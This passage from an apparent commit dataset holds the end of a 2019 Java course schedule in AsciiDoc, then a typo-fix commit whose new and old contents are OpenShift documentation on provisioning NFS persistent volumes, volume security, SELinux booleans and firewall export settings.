5. Write a `SimpleCalculator` that uses the normal Java addition (\u201c+\u201d) to implement `Calculator`.\n\/\/interfaces with generics\n* Implement a `Predicate<String>` to represent a function that associates to a String the value `true` iff its length is even.\n* Define a class `Pair<T1, T2>` to store an ordered pair of objects of type `T1` and `T2`.\n\/\/ implements but no inheritance\n* http:\/\/math.hws.edu\/javanotes8\/c5\/exercises.html[EE5.7] [I] (the part about anonymous classes is optional)\n\/\/** Supplementary requirements: your code must lie in at least two packages;\n\/\/** The idea of this exercice is that you simulate that three different people work on this exercice: one provides some interfaces; another implements the interfaces; a third one uses the interfaces and their implementations to solve the exercice (except you represent all these persons).\n\/\/** Declare at least one interface in another Eclipse project, exported as a Java archive (JAR file);\n\/\/** implement those interfaces in another Eclipse project, exported as a Java archive (JAR file) (will you need the previous JAR file? Why \/ why not?);\n\/\/** solve the exercices in a third Eclipse project (will you need the previous JAR files? Which ones and why?).\n\/\/ read, sort a list\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.1], 7.5 (except that you can use built-sorting functions from the Java API).\n* A class E1 that asks the end-user for a set of integer values. The user enters 0 to stop entering values. Store these values in a Set of Integer values (discarding duplicates). Do it again, obtaining a second set. Then print each set of values entered, then the union of both sets. For example, if the user enters 3, 4, 2, 0, then 1, 1, 2, 5, 0, it prints: 3, 4, 2, then 1, 2, 5, then 3, 4, 2, 1, 5. Use Java sets and interfaces appropriately. [I]\n\n*Todo*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Tools.adoc#configuration[Tools]: use correct Eclipse config. (Check warnings, compile errors, instructions!)\n* Commit mandatory exercices https:\/\/classroom.github.com\/a\/X7DXDNfU[here].\n\n[[S6]]\n=== S6 (Wednesday 17th of April, 2019)\n\n*Lecture*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/tree\/master\/Maven[Maven]\n* Use https:\/\/mvnrepository.com\/artifact\/com.google.guava\/guava\/27.1-jre[Guava] `https:\/\/github.com\/google\/guava\/wiki\/PreconditionsExplained[Preconditions]#checkArgument`\n* Overload `toString()`: use Guava https:\/\/guava.dev\/releases\/snapshot\/api\/docs\/com\/google\/common\/base\/MoreObjects.ToStringHelper.html[`MoreObjects`]\n* null (started)\n* Correct E1\n.. d\u00e9coup\u00e9 en sous-routines ?\n.. contrat g\u00e9n\u00e9ral (Collection au lieu de LinkedList) ?\n.. noms complets de classes uniques ?\n.. structures appropri\u00e9es ? (Set)\n.. r\u00e9utilisation si on demande les nombres diff\u00e9remment ? (Lus depuis fichiers)\n.. nommage appropri\u00e9 ? (searchNumber renvoie boolean, non, devrait poser une question: isIn)\n.. documentation javadoc lorsque n\u00e9cessaire ?\n.. utilisation ad\u00e9quate des structures ? (ne pas rechercher un nombre dans une liste)\n.. conventions respect\u00e9es ? (noms de variables et m\u00e9thodes en camelCase, de classes en PascalCase, de packages en minuscules, \u2026)\n.. m\u00e9thodes d\u2019instance (et pas statiques) ?\n.. pas de commentaires inutiles (tq auto-g\u00e9n\u00e9r\u00e9s \/\/TODO, @author vide, \u2026)\n.. (micro) pas de comparaison \u00e0 `true` (`if(isBig == true)`)\n.. vous arrivez \u00e0 voir le r\u00e9sultat de votre code javadoc (exemple: `@param truc of type String` inutile)\n* Maps, Comparable, Comparator (voir aussi diapos Airiau)\n\n*Material and going beyond*\n\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c10\/[ES10.3] to 10.5\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c8\/[ES8] intro to 8.4\n\n*Exercices*\n\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.1]\n\/\/interfaces with generics and collections\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.4]\n\n[[S7]]\n=== S7 (Friday 19th of April, 2019)\n\n* No plagiarism (but reuse!)\n* Static factory method\n** A static method\n** Produces the type of the class it belongs to\n** Serves as a factory\n** Examples: `String.valueOf(true);`, `Integer.valueOf(3);`, `ImmutableList.of();`, `String.link:https:\/\/docs.oracle.com\/en\/java\/javase\/11\/docs\/api\/java.base\/java\/lang\/String.html#format(java.lang.String,java.lang.Object...)[format](\"Person name: %s, id: %d\", name, id);`\n* https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/arguments.html[Varargs]\n* Files and https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Flows.adoc[flows]\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Resources.adoc[Resources]; exercice: read a file from the class path.\n* Primitive types (autoboxing); optional; give guarantees: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Null.adoc[Best practices]\n\n*Exercices*\n\n* Implement an interface `EasyMap` with two methods: a method that puts a pair of key and value of your choice into a map, and a method that returns an `Optional` containing the value corresponding to the given key (parameter of the method) or that returns an empty `Optional` if there is no such value. Implement this interface in a class `EasyMapImpl`. Provide a static factory method in the interface `EasyMap`. Minimize the number of lines of code (but not at the price of readability). Note that this exercice implements the https:\/\/en.wikipedia.org\/wiki\/Forwarding_(object-oriented_programming)[forwarding] pattern.\n** Define `MyComparator`, a class that implements a comparator over your values. Add a third method to `EasyMap`, that returns a list of values ordered by that comparator.\n\/\/ list of words\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.6] (do not use the provided method: split words at space character; use standard file IO instead of TextIO)\n\n*Todo*\n\n* Read https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Tools.adoc#eclipse[Eclipse] doc (or equivalent for your IDE of choice)\n* Make sure you can see the javadoc of the JDK and of the libraries you add through Maven through your IDE, for coding efficiently\n* If you use an IDE different than Eclipse, you are supposed to adjust your parameters to match the configuration provided for Eclipse (see Tools.adoc).\n\n[[S8]]\n=== S8 (Monday 6th of May, 2019)\n\n* Questions?\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Extractor.adoc[exercice]\n** Submitted code must be clean: well-formatted, clear, well named, \u2026\n** Must compile using Maven (otherwise, no point awarded)\n** No warning given by Eclipse\n** 15h44 to 16h24\n* Choose your https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Projets.adoc[project]\n* Comparing Persons, revisited, using https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/lambdaexpressions.html[Lambda Expressions]\n* Override `equals` and `hashcode`\n\n[[S9]]\n=== S9 (Friday 10th of May, 2019)\n\n* Tentative coefficients: graded quizz: 0.5, Extractor: 0.5, next graded exercices: 1, last graded exercice: 2\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/DevOps\/CI.adoc[CI]: Travis\n* TODO : livraison 1 avant fin de la veille de S10.\n\n[[S10]]\n=== S10 (Monday 20th of May, 2019)\n\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Dep-Git.adoc[exercice] (about Maven dependencies and Git)\n* https:\/\/stackoverflow.com\/questions\/28972893\/what-is-exception-wrapping-in-java[Wrapping] exceptions\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Log\/README.adoc[Logging]\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Annotations\/presentation.pdf[Annotations]\n\n[[S11]]\n=== S11 (Thursday 23rd of May, 2019)\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/tree\/master\/SWT[SWT]\n\n[[S12]]\n=== S12 (Friday 24th of May, 2019)\n\n* Back to https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/lambdaexpressions.html[Method references]\n* TODO : livraison suivante avant fin de la veille de la prochaine s\u00e9ance.\n\n[[S13]]\n=== S13 (Tuesday 4th of June, 2019)\n\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/JUnit.adoc[exercice]: unit tests \/ access resources through class path \/ continue Extractor.\n** 17h17 to 17h42 (5 min for delays due to GitHub)\n\n* Write the list of PRs for Iteration 2 for each sub-team in `README.adoc` in your `dev` branch.\n\n[[S14]]\n=== S14 (Wednesday 5th of June, 2019)\n\n* Licenses and philosophy: https:\/\/www.gnu.org\/philosophy\/philosophy.html[GNU]; https:\/\/opensource.org\/[OSI]; Copyleft (GNU https:\/\/opensource.org\/licenses\/GPL-3.0[GPL]); Non-copyleft (https:\/\/opensource.org\/licenses\/MIT[MIT])\n* Parsing HTML: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/HTML%20to%20DOM.adoc[DOM]\n* Accessing REST web services: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/WS%20client\/JAX-RS%20client.adoc[JAX-RS client]\n\n[[S15]]\n=== S15 (Monday 17th of June, 2019)\n\n* Work on project\n* TODO : livraison 3 avant fin du jeudi 20, avec PRs affect\u00e9es \u00e0 une Milestone \u00ab\u202fIt\u00e9ration 3\u202f\u00bb (merci \u00e0 l\u2019\u00e9quipe Assisted Board Games pour cette astuce).\n\n[[S16]]\n=== S16 (Friday 21st of June, 2019)\n\n* Work on project\n* TODO : livraison 4 avant fin du vendredi 28, avec PRs affect\u00e9es \u00e0 une Milestone \u00ab\u202fIt\u00e9ration 4\u202f\u00bb.\n** Facultatif : une t\u00e2che qui ajoute dans votre README des \u00e9l\u00e9ments que vous d\u00e9sirez que je prenne en compte dans mon \u00e9valuation globale (difficult\u00e9s rencontr\u00e9es, travaux que j\u2019aurais oubli\u00e9 d\u2019\u00e9valuer lors d\u2019une it\u00e9ration pr\u00e9c\u00e9dente, \u2026). Compl\u00e9mentez vos propos d\u2019\u00e9l\u00e9ments v\u00e9rifiables (commits, documents, \u2026).\n** Remise autoris\u00e9e jusqu\u2019\u00e0 la fin du samedi 29 si n\u00e9cessaire, mais une prime sera accord\u00e9e pour une remise le vendredi soir.\n* Pr\u00e9sentation avant fin du dimanche 30 directement sur branche master, dans `Doc\/Pr\u00e9sentation 2019.pdf`.\n\n[[S17]]\n=== S17 (Monday 1st of July, 2019)\n\n* Pr\u00e9sentations : \nhttps:\/\/github.com\/13tomoore\/J-Confs\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[J-Confs], \nhttps:\/\/github.com\/Amioplk\/Apartments\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[Apartments], \nhttps:\/\/github.com\/CHARLONCyril\/2D-Library\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[2D Library], \nhttps:\/\/github.com\/busychess\/Assisted-Board-Games\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[Assisted Board Games], \nhttps:\/\/github.com\/j-voting\/J-Voting\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[J-Voting]\n** Code & diapos sur ordinateur de pr\u00e9sentation\n** 15 \u00e0 30 minutes\n** Not\u00e9 : int\u00e9r\u00eat pour l\u2019audience ; compr\u00e9hension par l\u2019audience du contexte et de l\u2019objectif du projet ; compr\u00e9hension par l\u2019audience de l\u2019architecture du code et des aspects techniques ; distinction claire des fcts d\u00e9j\u00e0 pr\u00e9sentes VS ajout\u00e9es ; originalit\u00e9 & cr\u00e9ativit\u00e9 \u00e9ventuelle ; \u2026\n* Votes\n* Evals, and https:\/\/github.com\/oliviercailloux\/projets\/blob\/master\/Licences\/Licence.adoc[Licences]: https:\/\/github.com\/oliviercailloux\/projets\/raw\/master\/Licences\/Declaration%20of%20licensing.odt[Decl]\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b173ee7bb78405c83efdeb9ab84ff0be82c1c898","subject":"Fix 'supplemental' typo","message":"Fix 'supplemental' typo\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"install_config\/persistent_storage\/persistent_storage_nfs.adoc","new_file":"install_config\/persistent_storage\/persistent_storage_nfs.adoc","new_contents":"= Persistent Storage Using NFS\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\n\nOpenShift clusters can be provisioned with\nlink:..\/..\/architecture\/additional_concepts\/storage.html[persistent storage]\nusing NFS. Persistent volumes (PVs) and persistent volume claims (PVCs) provide\na convenient method for sharing a volume across a project. While the\nNFS-specific information contained in a PV definition could also be defined\ndirectly in a pod definition, doing so does not create the volume as a distinct\ncluster resource, making the volume more susceptible to conflicts.\n\nThis topic covers the specifics of using the NFS persistent storage type. Some\nfamiliarity with OpenShift and\nhttps:\/\/access.redhat.com\/documentation\/en-US\/Red_Hat_Enterprise_Linux\/7\/html\/Storage_Administration_Guide\/ch-nfs.html[NFS]\nis beneficial. See the\nlink:..\/..\/architecture\/additional_concepts\/storage.html[Persistent Storage]\nconcept topic for details on the OpenShift persistent volume (PV) framework in\ngeneral.\n\n[[nfs-provisioning]]\n== Provisioning\n\nStorage must exist in the underlying infrastructure before it can be mounted as\na volume in OpenShift. To provision NFS volumes, a list of NFS servers and\nexport paths are all that is required.\n\nYou must first create an object definition for the PV:\n\n.PV Object Definition Using NFS\n====\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolume\nmetadata:\n name: pv0001 <1>\nspec:\n capacity:\n storage: 5Gi <2>\n accessModes:\n - ReadWriteOnce <3>\n nfs: <4>\n path: \/tmp <5>\n server: 172.17.0.2 <6>\n persistentVolumeReclaimPolicy: Recycle <7>\n----\n<1> The name of the volume. This is the PV identity in various `oc <command>\npod` commands.\n<2> The amount of storage allocated to this volume.\n<3> Though this appears to be related to controlling access to the volume, it is\nactually used similarly to labels and used to match a PVC to a PV. Currently, no\naccess rules are enforced based on the `*accessModes*`.\n<4> The volume type being used, in this case the *nfs* plug-in.\n<5> The path that is exported by the NFS server.\n<6> The host name or IP address of the NFS server.\n<7> The reclaim policy for the PV. This defines what happens to a volume when released\nfrom its claim. Valid options are *Retain* (default) and *Recycle*. See\nlink:#nfs-reclaiming-resources[Reclaiming Resources].\n====\n\n[NOTE]\n====\nEach NFS volume must be mountable by all schedulable nodes in the cluster.\n====\n\nSave the definition to a file, for example *_nfs-pv.yaml_*, and create the PV:\n\n====\n----\n$ oc create -f nfs-pv.yaml\npersistentvolume \"pv0001\" created\n----\n====\n\nVerify that the PV was created:\n\n====\n----\n# oc get pv\nNAME LABELS CAPACITY ACCESSMODES STATUS CLAIM REASON AGE\npv0001 <none> 5368709120 RWO Available 31s\n----\n====\n\nThe next step can be to create a persistent volume claim (PVC) which will bind\nto the new PV:\n\n.PVC Object Definition\n====\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: nfs-claim1\nspec:\n accessModes:\n - ReadWriteOnce <1>\n resources:\n requests:\n storage: 1Gi <2>\n----\n<1> As mentioned above for PVs, the `*accessModes*` do not enforce security, but\nrather act as labels to match a PV to a PVC.\n<2> This claim will look for PVs offering *1Gi* or greater capacity.\n====\n\nSave the definition to a file, for example *_nfs-claim.yaml_*, and create the\nPVC:\n\n====\n----\n# oc create -f nfs-claim.yaml\n----\n====\n\n[[nfs-enforcing-disk-quotas]]\n== Enforcing Disk Quotas\n\nYou can uses disk partitions to enforce disk quotas and size constraints. Each\npartition can be its own export. Each export is one PV. OpenShift enforces\nunique names for PVs, but the uniqueness of the NFS volume's server and path is\nup to the administrator.\n\nEnforcing quotas in this way allows the developer to request persistent storage\nby a specific amount (for example, 10Gi) and be matched with a corresponding\nvolume of equal or greater capacity.\n\n[[nfs-volume-security]]\n== Volume Security\n\nThis section covers NFS volume security, including matching permissions and\nSELinux considerations. The reader is expected to understand the basics of POSIX\npermissions, process UIDs, supplemental groups, and SELinux.\n\n[NOTE]\n====\nSee the full\nlink:..\/..\/install_config\/persistent_storage\/pod_security_context.html[Volume\nSecurity] topic before implementing NFS volumes.\n====\n\nDevelopers request NFS storage by referencing, in the `*volumes*` section of\ntheir pod definition, either a PVC by name or the NFS volume plug-in directly.\n\nThe *_\/etc\/exports_* file on the NFS server contains the accessible NFS\ndirectories. The target NFS directory has POSIX owner and group IDs. The\nOpenShift NFS plug-in mounts the container's NFS directory with the same POSIX\nownership and permissions found on the exported NFS directory. However, the\ncontainer is not run with its effective UID equal to the owner of the NFS mount,\nwhich is the desired behavior.\n\nAs an example, if the target NFS directory appears on the NFS server as:\n\n[[nfs-export]]\n====\n----\n# ls -lZ \/opt\/nfs -d\ndrwxrws---. nfsnobody 5555 unconfined_u:object_r:usr_t:s0 \/opt\/nfs\n\n# id nfsnobody\nuid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)\n----\n====\n\nThen the container must match SELinux labels, and either run with a UID of\n*65534* (*nfsnobody* owner) or with *5555* in its supplemental groups in order\nto access the directory.\n\n[NOTE]\n====\nThe owner ID of 65534 is used as an example. Even though NFS's *root_squash*\nmaps *root* (0) to *nfsnobody* (65534), NFS exports can have arbitrary owner\nIDs. Owner 65534 is not required for NFS exports.\n====\n\n[[nfs-supplemental-groups]]\n=== Group IDs\n\nThe recommended way to handle NFS access (assuming it is not an option to change\npermissions on the NFS export) is to use supplemental groups. Supplemental\ngroups in OpenShift are used for shared storage, of which NFS is an example. In\ncontrast, block storage, such as Ceph RBD or iSCSI, use the *fsGroup* SCC\nstrategy and the *fsGroup* value in the pod's `*securityContext*`.\n\n[NOTE]\n====\nIt is generally preferable to use supplemental group IDs to gain access to\npersistent storage versus using link:#nfs-user-ids[user IDs]. Supplemental\ngroups are covered further in the full\nlink:pod_security_context.html#supplemental-groups[Volume Security] topic.\n====\n\nBecause the group ID on the link:#nfs-export[example target NFS directory] shown\nabove is 5555, the pod can define that group ID using `*supplementalGroups*`\nunder the pod-level `*securityContext*` definition. For example:\n\n====\n----\nspec:\n containers:\n - name:\n ...\n securityContext: <1>\n supplementalGroups: [5555] <2>\n----\n<1> `*securityContext*` must be defined at the pod level, not under a specific container.\n<2> An array of GIDs defined for the pod. In this case, there is one element in the array;\nadditional GIDs would be comma-separated.\n====\n\nAssuming there are no custom SCCs that might satisfy the pod's requirements, the\npod will likely match the *restricted* SCC. This SCC has the\n`*supplementalGroups*` strategy set to *RunAsAny*, meaning that any supplied\ngroup ID will be accepted without range checking.\n\nAs a result, the above pod will pass admissions and will be launched. However,\nif group ID range checking is desired, a custom SCC, as described in\nlink:pod_security_context#scc-supplemental-groups[pod security and custom SCCs],\nis the preferred solution. A custom SCC can be created such that minimum and\nmaximum group IDs are defined, group ID range checking is enforced, and a group\nID of 5555 is allowed.\n\n[[nfs-user-ids]]\n=== User IDs\n\nUser IDs can be defined in the container image or in the pod definition. The\nfull link:pod_security_context.html#user-id[Volume Security] topic covers\ncontrolling storage access based on user IDs, and should be read prior to\nsetting up NFS persistent storage.\n\n[NOTE]\n====\nIt is generally preferable to use link:#nfs-supplemental-groups[supplemental\ngroup IDs] to gain access to persistent storage versus using user IDs.\n====\n\nIn the link:#nfs-export[example target NFS directory] shown above, the container\nneeds its UID set to 65534 (ignoring group IDs for the moment), so the following\ncan be added to the pod definition:\n\n====\n[source,yaml]\n----\nspec:\n containers: <1>\n - name:\n ...\n securityContext:\n runAsUser: 65534 <2>\n----\n<1> Pods contain a `*securtityContext*` specific to each container (shown here) and\na pod-level `*securityContext*` which applies to all containers defined in the pod.\n<2> 65534 is the *nfsnobody* user.\n====\n\nAssuming the *default* project and the *restricted* SCC, the pod's requested\nuser ID of 65534 will, unfortunately, not be allowed, and therefore the pod will\nfail. The pod fails because of the following:\n\n- It requests 65534 as its user ID.\n- All SCCs available to the pod are examined to see which SCC will allow a user ID\nof 65534 (actually, all policies of the SCCs are checked but the focus here is\non user ID).\n- Because all available SCCs use *MustRunAsRange* for their `*runAsUser*`\nstrategy, UID range checking is required.\n- 65534 is not included in the SCC or project's user ID range.\n\nIt is generally considered a good practice not to modify the predefined SCCs.\nThe preferred way to fix this situation is to create a custom SCC, as described\nin the full link:pod_security_context.html#scc-runasuser[Volume Security] topic.\nA custom SCC can be created such that minimum and maximum user IDs are defined,\nUID range checking is still enforced, and the UID of 65534 will be allowed.\n\n[[nfs-selinux]]\n=== SELinux\n\n[NOTE]\n====\nSee the full link:pod_security_context.html#volsec-selinux[Volume Security]\ntopic for information on controlling storage access in conjunction with using\nSELinux.\n====\n\nBy default, SELinux does not allow writing from a pod to a remote NFS server.\nThe NFS volume mounts correctly, but is read-only.\n\nTo enable writing to NFS volumes with SELinux enforcing on each node, run:\n\n----\n# setsebool -P virt_use_nfs 1\n# setsebool -P virt_sandbox_use_nfs 1\n----\n\nThe `-P` option above makes the bool persistent between reboots.\n\nThe *virt_use_nfs* boolean is defined by the *_docker-selinux_* package. If an\nerror is seen indicating that this bool is not defined, ensure this package has\nbeen installed.\n\n[[nfs-export-settings]]\n=== Export Settings\n\nIn order to enable arbitrary container users to read and write the volume, each\nexported volume on the NFS server should conform to the following conditions:\n\n- Each export must be:\n+\n----\n\/<example_fs> *(rw,root_squash)\n----\n- The firewall must be configured to allow traffic to the mount point. For NFSv4,\nthe default port is 2049 (*nfs*). For NFSv3, there are three ports to configure:\n2049 (*nfs*), 20048 (*mountd*), and 111 (*portmapper*).\n+\n.NFSv4\n----\n# iptables -I INPUT 1 -p tcp --dport 2049 -j ACCEPT\n----\n+\n.NFSv3\n----\n# iptables -I INPUT 1 -p tcp --dport 2049 -j ACCEPT\n# iptables -I INPUT 1 -p tcp --dport 20048 -j ACCEPT\n# iptables -I INPUT 1 -p tcp --dport 111 -j ACCEPT\n----\n- The NFS export and directory must be set up so that it is accessible by the\ntarget pods. Either set the export to be owned by the container's primary UID,\nor supply the pod group access using `*supplementalGroups*`, as shown in\nlink:#nfs-supplemental-groups[Group IDs] above. See the full\nlink:pod_security_context.html[Volume Security] topic for additional pod\nsecurity information as well.\n\n[[nfs-reclaiming-resources]]\n== Reclaiming Resources\nNFS implements the OpenShift *Recyclable* plug-in interface. Automatic\nprocesses handle reclamation tasks based on policies set on each persistent\nvolume.\n\nBy default, persistent volumes are set to *Retain*. NFS volumes which are set to\n*Recycle* are scrubbed (i.e., `rm -rf` is run on the volume) after being\nreleased from their claim (i.e, after the user's `*PersistentVolumeClaim*` bound\nto the volume is deleted). Once recycled, the NFS volume can be bound to a new\nclaim.\n\n[[nfs-automation]]\n== Automation\nClusters can be provisioned with persistent storage using NFS in the following\nways:\n\n- link:#nfs-enforcing-disk-quotas[Enforce storage quotas] using disk partitions.\n- Enforce security by link:#nfs-volume-security[restricting volumes] to the\nproject that has a claim to them.\n- Configure link:#nfs-reclaiming-resources[reclamation of discarded resources] for\neach PV.\n\nThey are many ways that you can use scripts to automate the above tasks. You can\nuse an\nlink:https:\/\/github.com\/openshift\/openshift-ansible\/tree\/master\/roles\/kube_nfs_volumes[example\nAnsible playbook] to help you get started.\n\n[[nfs-additional-config-and-troubleshooting]]\n== Additional Configuration and Troubleshooting\n\nDepending on what version of NFS is being used and how it is configured, there\nmay be additional configuration steps needed for proper export and security\nmapping. The following are some that may apply:\n\n[cols=\"1,2\"]\n|====\n\n|NFSv4 mount incorrectly shows all files with ownership of *nobody:nobody*\na|- Could be attributed to the ID mapping settings (\/etc\/idmapd.conf) on your NFS\n- See https:\/\/access.redhat.com\/solutions\/33455[this Red Hat Solution].\n\n|Disabling ID mapping on NFSv4\na|- On both the NFS client and server, run:\n+\n----\n# echo 'Y' > \/sys\/module\/nfsd\/parameters\/nfs4_disable_idmapping\n----\n|====\n","old_contents":"= Persistent Storage Using NFS\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\n\nOpenShift clusters can be provisioned with\nlink:..\/..\/architecture\/additional_concepts\/storage.html[persistent storage]\nusing NFS. Persistent volumes (PVs) and persistent volume claims (PVCs) provide\na convenient method for sharing a volume across a project. While the\nNFS-specific information contained in a PV definition could also be defined\ndirectly in a pod definition, doing so does not create the volume as a distinct\ncluster resource, making the volume more susceptible to conflicts.\n\nThis topic covers the specifics of using the NFS persistent storage type. Some\nfamiliarity with OpenShift and\nhttps:\/\/access.redhat.com\/documentation\/en-US\/Red_Hat_Enterprise_Linux\/7\/html\/Storage_Administration_Guide\/ch-nfs.html[NFS]\nis beneficial. See the\nlink:..\/..\/architecture\/additional_concepts\/storage.html[Persistent Storage]\nconcept topic for details on the OpenShift persistent volume (PV) framework in\ngeneral.\n\n[[nfs-provisioning]]\n== Provisioning\n\nStorage must exist in the underlying infrastructure before it can be mounted as\na volume in OpenShift. To provision NFS volumes, a list of NFS servers and\nexport paths are all that is required.\n\nYou must first create an object definition for the PV:\n\n.PV Object Definition Using NFS\n====\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolume\nmetadata:\n name: pv0001 <1>\nspec:\n capacity:\n storage: 5Gi <2>\n accessModes:\n - ReadWriteOnce <3>\n nfs: <4>\n path: \/tmp <5>\n server: 172.17.0.2 <6>\n persistentVolumeReclaimPolicy: Recycle <7>\n----\n<1> The name of the volume. This is the PV identity in various `oc <command>\npod` commands.\n<2> The amount of storage allocated to this volume.\n<3> Though this appears to be related to controlling access to the volume, it is\nactually used similarly to labels and used to match a PVC to a PV. Currently, no\naccess rules are enforced based on the `*accessModes*`.\n<4> The volume type being used, in this case the *nfs* plug-in.\n<5> The path that is exported by the NFS server.\n<6> The host name or IP address of the NFS server.\n<7> The reclaim policy for the PV. This defines what happens to a volume when released\nfrom its claim. Valid options are *Retain* (default) and *Recycle*. See\nlink:#nfs-reclaiming-resources[Reclaiming Resources].\n====\n\n[NOTE]\n====\nEach NFS volume must be mountable by all schedulable nodes in the cluster.\n====\n\nSave the definition to a file, for example *_nfs-pv.yaml_*, and create the PV:\n\n====\n----\n$ oc create -f nfs-pv.yaml\npersistentvolume \"pv0001\" created\n----\n====\n\nVerify that the PV was created:\n\n====\n----\n# oc get pv\nNAME LABELS CAPACITY ACCESSMODES STATUS CLAIM REASON AGE\npv0001 <none> 5368709120 RWO Available 31s\n----\n====\n\nThe next step can be to create a persistent volume claim (PVC) which will bind\nto the new PV:\n\n.PVC Object Definition\n====\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: nfs-claim1\nspec:\n accessModes:\n - ReadWriteOnce <1>\n resources:\n requests:\n storage: 1Gi <2>\n----\n<1> As mentioned above for PVs, the `*accessModes*` do not enforce security, but\nrather act as labels to match a PV to a PVC.\n<2> This claim will look for PVs offering *1Gi* or greater capacity.\n====\n\nSave the definition to a file, for example *_nfs-claim.yaml_*, and create the\nPVC:\n\n====\n----\n# oc create -f nfs-claim.yaml\n----\n====\n\n[[nfs-enforcing-disk-quotas]]\n== Enforcing Disk Quotas\n\nYou can uses disk partitions to enforce disk quotas and size constraints. Each\npartition can be its own export. Each export is one PV. OpenShift enforces\nunique names for PVs, but the uniqueness of the NFS volume's server and path is\nup to the administrator.\n\nEnforcing quotas in this way allows the developer to request persistent storage\nby a specific amount (for example, 10Gi) and be matched with a corresponding\nvolume of equal or greater capacity.\n\n[[nfs-volume-security]]\n== Volume Security\n\nThis section covers NFS volume security, including matching permissions and\nSELinux considerations. The reader is expected to understand the basics of POSIX\npermissions, process UIDs, supplemental groups, and SELinux.\n\n[NOTE]\n====\nSee the full\nlink:..\/..\/install_config\/persistent_storage\/pod_security_context.html[Volume\nSecurity] topic before implementing NFS volumes.\n====\n\nDevelopers request NFS storage by referencing, in the `*volumes*` section of\ntheir pod definition, either a PVC by name or the NFS volume plug-in directly.\n\nThe *_\/etc\/exports_* file on the NFS server contains the accessible NFS\ndirectories. The target NFS directory has POSIX owner and group IDs. The\nOpenShift NFS plug-in mounts the container's NFS directory with the same POSIX\nownership and permissions found on the exported NFS directory. However, the\ncontainer is not run with its effective UID equal to the owner of the NFS mount,\nwhich is the desired behavior.\n\nAs an example, if the target NFS directory appears on the NFS server as:\n\n[[nfs-export]]\n====\n----\n# ls -lZ \/opt\/nfs -d\ndrwxrws---. nfsnobody 5555 unconfined_u:object_r:usr_t:s0 \/opt\/nfs\n\n# id nfsnobody\nuid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)\n----\n====\n\nThen the container must match SELinux labels, and either run with a UID of\n*65534* (*nfsnobody* owner) or with *5555* in its supplemental groups in order\nto access the directory.\n\n[NOTE]\n====\nThe owner ID of 65534 is used as an example. Even though NFS's *root_squash*\nmaps *root* (0) to *nfsnobody* (65534), NFS exports can have arbitrary owner\nIDs. Owner 65534 is not required for NFS exports.\n====\n\n[[nfs-supplemental-groups]]\n=== Group IDs\n\nThe recommended way to handle NFS access (assuming it is not an option to change\npermissions on the NFS export) is to use supplemental groups. Supplemental\ngroups in OpenShift are used for shared storage, of which NFS is an example. In\ncontrast, block storage, such as Ceph RBD or iSCSI, use the *fsGroup* SCC\nstrategy and the *fsGroup* value in the pod's `*securityContext*`.\n\n[NOTE]\n====\nIt is generally preferable to use supplemental group IDs to gain access to\npersistent storage versus using link:#nfs-user-ids[user IDs]. Supplemental\ngroups are covered further in the full\nlink:pod_security_context.html#supplemental-groups[Volume Security] topic.\n====\n\nBecause the group ID on the link:#nfs-export[example target NFS directory] shown\nabove is 5555, the pod can define that group ID using `*supplementalGroups*`\nunder the pod-level `*securityContext*` definition. For example:\n\n====\n----\nspec:\n containers:\n - name:\n ...\n securityContext: <1>\n supplementalGroups: [5555] <2>\n----\n<1> `*securityContext*` must be defined at the pod level, not under a specific container.\n<2> An array of GIDs defined for the pod. In this case, there is one element in the array;\nadditional GIDs would be comma-separated.\n====\n\nAssuming there are no custom SCCs that might satisfy the pod's requirements, the\npod will likely match the *restricted* SCC. This SCC has the\n`*supplementalGroups*` strategy set to *RunAsAny*, meaning that any supplied\ngroup ID will be accepted without range checking.\n\nAs a result, the above pod will pass admissions and will be launched. However,\nif group ID range checking is desired, a 